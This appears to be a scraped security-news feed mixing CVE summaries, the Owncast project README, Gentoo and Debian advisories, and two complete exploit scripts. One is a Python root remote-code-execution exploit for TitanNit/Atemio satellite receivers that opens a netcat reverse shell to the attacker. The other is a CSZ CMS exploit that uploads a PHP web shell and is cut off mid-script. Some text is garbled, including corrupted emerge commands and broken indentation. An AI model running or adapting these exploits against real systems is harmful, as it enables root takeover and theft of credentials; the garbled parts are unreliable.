Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary
JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation.

CVE-2023-49145: Apache NiFi Security Reports

An issue in OwnCast v.0.1.1 allows a remote attacker to execute arbitrary code and obtain sensitive information via the authHost parameter of the indieauth function.

**Take control over your content and stream it yourself.**  
**Explore the docs »**  
View Demo · Use Our Server for Testing · FAQ · Report Bug

**Table of Contents**

*   About the Project
*   Getting Started
*   Use with your broadcasting software
*   Building from source
*   Contributing
*   License
*   Contact

**About The Project**

Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server for running your own live streams similar in style to the large mainstream options. It offers complete ownership over your content, interface, moderation and audience. Visit the demo for an example.

   

**Getting Started**

The goal is to have a single service that you can run and it works out of the box. **Visit the Quickstart to get up and running.**

**Use with your existing broadcasting software**

In general, Owncast is compatible with any software that uses RTMP to broadcast to a remote server. RTMP is what all the major live streaming services use, so if you’re currently using one of those it’s likely that you can point your existing software at your Owncast instance instead.

OBS, Streamlabs, Restream and many others have been used with Owncast. Read more about compatibility with existing software.

**Building from Source**

Owncast consists of two projects.

1.  The Owncast backend is written in Go.
2.  The frontend is written in React.

Read more about running from source.

**Important note about source code and the develop branch**

The develop branch is always the most up-to-date state of development and this may not be what you always want. If you want to run the latest released stable version, check out the tag related to that release. For example, if you'd only like the source prior to the v0.1.0 development cycle you can check out the v0.0.13 tag.

> Note: Currently Owncast does not natively support Windows servers. However, Windows Users can use Windows Subsystem for Linux (WSL2) to install Owncast. For details visit this document.

**Backend**

The Owncast backend is a service written in Go.

1.  Ensure you have prerequisites installed.
    *   C compiler, such as GCC compiler or a Musl-compatible compiler
    *   ffmpeg
2.  Install the Go toolchain (1.21 or above).
3.  Clone the repo. git clone https://github.com/owncast/owncast
4.  go run main.go will run from the source.
5.  Visit http://yourserver:8080 to access the web interface or http://yourserver:8080/admin to access the admin.
6.  Point your broadcasting software at your new server and start streaming.

**Frontend**

The frontend is the web interface that includes the player, chat, embed components, and other UI.

1.  This project lives in the web directory.
2.  Run npm install to install the Javascript dependencies.
3.  Run npm run dev

**Contributing**

Owncast is a growing open source project that is giving freedom, flexibility and fun to live streamers. And while we have a small team of kind, talented and thoughtful volunteers, we have gaps in our skillset that we’d love to fill so we can get even better at building tools that make a difference for people.

We abide by our Code of Conduct and feel strongly about open, appreciative, and empathetic people joining us. We’ve been very lucky to have this so far, so maybe you can help us with your skills and passion, too!

There is a larger, more detailed, and more up-to-date guide for helping contribute to Owncast on our website.

**License**

Distributed under the MIT License. See LICENSE for more information.

**Supported by**

*   This project is tested with BrowserStack.

**Contact**

Project chat: Join us on Rocket.Chat if you want to contribute, follow along, or if you have questions.

Gabe Kangas - @gabek@social.gabekangas.com - email gabek@real-ity.com

Project Link: https://github.com/owncast/owncast

CVE-2023-46480: GitHub - owncast/owncast: Take control over your live stream video by running it yourself.  Streaming + chat out of the box.

The Atemio AM 520 HD Full HD satellite receiver has a vulnerability that enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the getcommand query within the application, allowing the attacker to gain root access. Firmware versions 2.01 and below are affected.

    #!/usr/bin/env python# -*- coding: utf-8 -*-### TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution### Vendor: AAF Digital HD Forum | Atelmo GmbH# Product web page: http://www.aaf-digital.info | https://www.atemio.de# Affected version: Firmware <=2.01## Summary: The Atemio AM 520 HD Full HD satellite receiver enables the# reception of digital satellite programs in overwhelming image quality# in both SD and HD ranges. In addition to numerous connections, the small# all-rounder offers a variety of plugins that can be easily installed# thanks to the large flash memory. The TitanNit Linux software used combines# the advantages of the existing E2 and Neutrino systems and is therefore# fast, stable and adaptable.## Desc: The vulnerability in the device enables an unauthorized attacker# to execute system commands with elevated privileges. This exploit is# facilitated through the use of the 'getcommand' query within the application,# allowing the attacker to gain root access.## ========================================================================# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999# [*] Starting callback listener child thread# [*] Listening on port 9999# [*] Generating callback payload# [*] Calling# [*] Callback waiting: 3s# [*] ('192.168.1.13', 40943) called back# [*] Rootshell session opened# sh: cannot set terminal process group (1134): Inappropriate ioctl for device# sh: no job control in this shell# sh-5.1# id# <-sh-5.1# id# uid=0(root) gid=0(root)# sh-5.1# cat /etc/shadow | grep root# <-sh-5.1# cat /etc/shadow | grep root# root:$6$TAdBGj2mY***:18729:0:99999:7:::# sh-5.1# exit# [*] OK, bye!## _# # =======================================================================## Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)#            GNU/Linux 3.14-1.17 (armv7l)#            GNU/Linux 3.14.2 (mips)#            ATEMIO M46506 revision 990#            Atemio 7600 HD STB#            CPU STx7105 Mboard#            titan web server### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5801# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php### 16.11.2023#from time import sleepimport threadingimport requestsimport socketimport sysclass RemoteControl:    def __init__(self):        self.timeout = 10        self.target = None        self.callback = None        self.cstop = threading.Event()        self.path = "/query?getcommand=&cmd="        self.lport = None        self.cmd = None    def beacon(self):        self.cmd   = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "        self.cmd  += self.callback + " "        self.cmd  += str(self.lport) + " "        self.cmd  += ">/tmp/j"        self.path += self.cmd        r = requests.get(self.target + self.path)    def slusaj(self):        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.bind(("0.0.0.0", self.lport))        s.listen(1)        print("[*] Listening on port " + str(self.lport))        sleep(1)        try:            conn, addr = s.accept()            print("\n[*]", addr, "called back")            print("[*] Rootshell session opened")            self.cstop.set()        except socket.timeout:            print("[-] Call return timeout\n[!] Check your ports")            conn.close()        while True:            try:                odg = conn.recv(999999).decode()                sys.stdout.write(odg)                command = input()                command += "\n"                if "exit" in command:                    exit(-17)                conn.send(command.encode())                sleep(0.5)                sys.stdout.write("<-" + odg.split("\n")[-1])            except:                print("[*] OK, bye!")                exit(-1)        s.close()    def tajmer(self):        for z in range(self.timeout, 0, -1):            poraka = f"[*] Callback waiting: {z}s"            print(poraka, end='', flush=True)            sys.stdout.flush()            sleep(1)            if self.cstop.is_set():                break            print(' ' * len(poraka), end='\r')        if not self.cstop.is_set():            print("[-] Call return timeout\n[!] Check your ports")            exit(0)        else:            print(end=' ')    def thricer(self):        print("[*] Starting callback listener child thread")        plet1 = threading.Thread(name="ZSL", target=self.slusaj)        plet1.start()        sleep(1)        print("[*] Generating callback payload")        sleep(1)        print("[*] Calling")        plet2 = threading.Thread(name="ZSL", target=self.tajmer)        plet2.start()        self.beacon()        plet1.join()        plet2.join()    def howto(self):        if len(sys.argv) != 4:            self.usage()        else:            self.target = sys.argv[1]            self.callback = sys.argv[2]            self.lport = int(sys.argv[3])            if not self.target.startswith("http"):                self.target = "http://{}".format(self.target)    def dostabesemolk(self):        naslov = """    o===--------------------------------------===o    |                                            |    | TitanNit Web Control Remote Code Execution |    |                ZSL-2023-5801               |    |                                            |    o===--------------------------------------===o                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          L!                         /_)                        / /L_______________________/ (__)_______________________  (__)                       \_(__)                          ||                          ||                          ||                          ||                          ||                          ||        """        print(naslov)    def usage(self):        self.dostabesemolk()        print("Usage: ./titan.py <target ip> <listen ip> <listen port>")        print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")        exit(0)    def main(self):        self.howto()        self.thricer()if __name__ == '__main__':    RemoteControl().main()

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

Gentoo Linux Security Advisory 202311-18 - Multiple vulnerabilities have been discovered in GLib. Versions greater than or equal to 2.74.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GLib: Multiple Vulnerabilities  
     Date: November 27, 2023  
     Bugs: #886197, #887807  
       ID: 202311-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in GLib.

Background  
=========  
GLib is a library providing a number of GNOME's core objects and  
functions.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-libs/glib  < 2.74.4      >= 2.74.4

Description  
==========  
Multiple vulnerabilities have been discovered in GLib. Please review the  
referenced CVEs for details.

Impact  
=====  
GVariant deserialization is vulnerable to an exponential blowup issue  
where a crafted GVariant can cause excessive processing, leading to  
denial of service.

GVariant deserialization fails to validate that the input conforms to  
the expected format, leading to denial of service.

GVariant deserialization is vulnerable to a slowdown issue where a  
crafted GVariant can cause excessive processing, leading to denial of  
service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GLib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/glib-2.74.4"

References  
=========  
[ 1 ] CVE-2023-29499  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29499  
[ 2 ] CVE-2023-32611  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32611  
[ 3 ] CVE-2023-32665  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32665

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-18

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-18

Debian Linux Security Advisory 5567-1 - Multiple buffer overflows and memory leak issues have been found in tiff, the Tag Image File Format (TIFF) library and tools, which may cause denial of service when processing a crafted TIFF image.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- - -------------------------------------------------------------------------Debian Security Advisory DSA-5567-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuNovember 27, 2023                     https://www.debian.org/security/faq- - -------------------------------------------------------------------------Package        : tiffCVE ID         : CVE-2023-3576 CVE-2023-40745 CVE-2023-41175Debian Bug     :Brief introductionMultiple buffer overflows and memory leak issues have been found in tiff,the Tag Image File Format (TIFF) library and tools, which may cause denialof service when processing a crafted TIFF image.For the oldstable distribution (bullseye), these problems have been fixedin version 4.2.0-1+deb11u5.For the stable distribution (bookworm), these problems have been fixed inversion 4.5.0-6+deb12u1.We recommend that you upgrade your tiff packages.For the detailed security status of tiff please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tiffFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmVkI0cACgkQO1LKKgqv2VT46QgAvtYySLyFvbEsmMlcHIFWXRtkqO2cxtsb7F0NDN8vl2yATpPN8ZWeEmFxES3DEpRJkAmZ9Of+87a06r4tdFAQlg/uqwMMO4WbdihUlzgnsRLXKUSUqHMFv3Wr9nvckp6OCwztPUb0G+bpAn+dJHqs6iF3q6ukwWcW0cprLQzigUMmxTnvWt4bc4eT1nfWRLWkwVObl488Lq94zawtB3NZoQaNvQDMHxVZ7VPsQvDSrKAT71/TnzFUpXJlUePBCKUmK1Q0a6akxBpoNAr6ujdrWcCPDMNl7+jBJE3AwoMPZptTlIsqKTYTT4qrtd80YDYxVScgc+t2GrO1PgzM12/Mqg==WLU7-----END PGP SIGNATURE-----

Debian Security Advisory 5567-1

Gentoo Linux Security Advisory 202311-17 - Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of which allows for denial of service. Versions greater than or equal to 5.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: phpMyAdmin: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #831841, #835071  
       ID: 202311-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in phpMyAdmin, the worst  
of which allows for denial of service.

Background  
=========  
phpMyAdmin is a tool written in PHP intended to handle the  
administration of MySQL over the web.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-db/phpmyadmin  < 5.2.0       >= 5.2.0

Description  
==========  
Multiple vulnerabilities have been discovered in phpMyAdmin. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All phpMyAdmin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-db/phpmyadmin-5.2.0"

References  
=========  
[ 1 ] CVE-2022-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0813  
[ 2 ] CVE-2022-23807  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23807  
[ 3 ] CVE-2022-23808  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23808

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-17

Gentoo Linux Security Advisory 202311-16 - Multiple denial of service vulnerabilities have been found in Open vSwitch. Versions greater than or equal to 2.17.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Open vSwitch: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #765346, #769995, #803107, #887561  
       ID: 202311-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple denial of service vulnerabilites have been found in Open  
vSwitch.

Background  
=========  
Open vSwitch is a production quality multilayer virtual switch.

Affected packages  
================  
Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
net-misc/openvswitch  < 2.17.6      >= 2.17.6

Description  
==========  
Multiple vulnerabilities have been discovered in Open vSwitch. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Open vSwitch users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openvswitch-2.17.6"

References  
=========  
[ 1 ] CVE-2020-27827  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27827  
[ 2 ] CVE-2020-35498  
      https://nvd.nist.gov/vuln/detail/CVE-2020-35498  
[ 3 ] CVE-2021-3905  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3905  
[ 4 ] CVE-2021-36980  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36980  
[ 5 ] CVE-2022-4337  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4337  
[ 6 ] CVE-2022-4338  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4338  
[ 7 ] CVE-2023-1668  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1668

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-16

Gentoo Linux Security Advisory 202311-15 - Multiple vulnerabilities have been discovered in LibreOffice, the worst of which could lead to code execution. Versions greater than or equal to 7.5.3.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibreOffice: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #908083  
       ID: 202311-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in LibreOffice, the worst  
of which could lead to code execution.

Background  
=========  
LibreOffice is a powerful office suite; its clean interface and powerful  
tools let you unleash your creativity and grow your productivity.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  ------------  
app-office/libreoffice      < 7.5.3.2     >= 7.5.3.2  
app-office/libreoffice-bin  < 7.5.3.2     >= 7.5.3.2

Description  
==========  
Multiple vulnerabilities have been discovered in LibreOffice. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibreOffice binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-bin-7.5.3.2"

All LibreOffice users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-7.5.3.2"

References  
=========  
[ 1 ] CVE-2023-0950  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0950  
[ 2 ] CVE-2023-2255  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2255

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-15

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-15

Debian Linux Security Advisory 5566-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5566-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 26, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-6212 CVE-2023-6209 CVE-2023-6208 CVE-2023-6207  
                 CVE-2023-6206 CVE-2023-6205 CVE-2023-6204

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.5.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.5.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmViiyoACgkQEMKTtsN8  
TjaZUhAAmpG5pqXk0eb9Lq/+PjBe6TjmyaZ1NUbrqnaD7Nygcq3CakX7vrLtlfT0  
M8JUiqHBIpAKZr5E/bs62bZDrf3EGzWJdnHkPs/pI9mpqYMPHxKuuJdOxNSnx216  
R5DUTMe945XodklRslY6gUjuPGlYIpmGSQwMSDnwCgGGWbJ2aRwML3wS56dgv/gd  
Uu7tsD7TBa7BoSTdwB5/J2faaGfptCcTTv5mBk4I4+sdUVo0c1Bzuy5oCVrwUpoB  
PtGKH/lRYyUW9S24O4yN26Up4UYbK212gAiiYdcoXCGxCzcmOuxKjPp4e4qxlR6F  
DYndBKM0zRJF+bIaeGQPgEcU0iCwq8GNcYykDeezUPV3OwA10oHVZZyJjHHEPIlT  
5Q6fbwWlFRqnjfmktJHWwlkQNSi/jI7UiGnnrWKNDtiNyRkfhawHPBwRDhZPxk2c  
E9drKQix9kt9ONNNNnJ9cWyrHwLa59VgZQmJ/swFBXZaxpetobNivCa1t0lCpbor  
jEV2RCrWrd1+AEDiXJxOpU9owLCp4RcBHDnDD+rL+s+CAo341HRhLVj0mYBWQcH3  
VtdGUxoKOfqUNZ1pw7uNNixNh3pJT2elJGn3c029nbNYFAGwrmUDoBt3+EKvj387  
s8QcNcCJCbqdyFqs1v3nQDXHe4zzcTohEIkt16dOPWLpfWodqoY=o6QP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5566-1

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
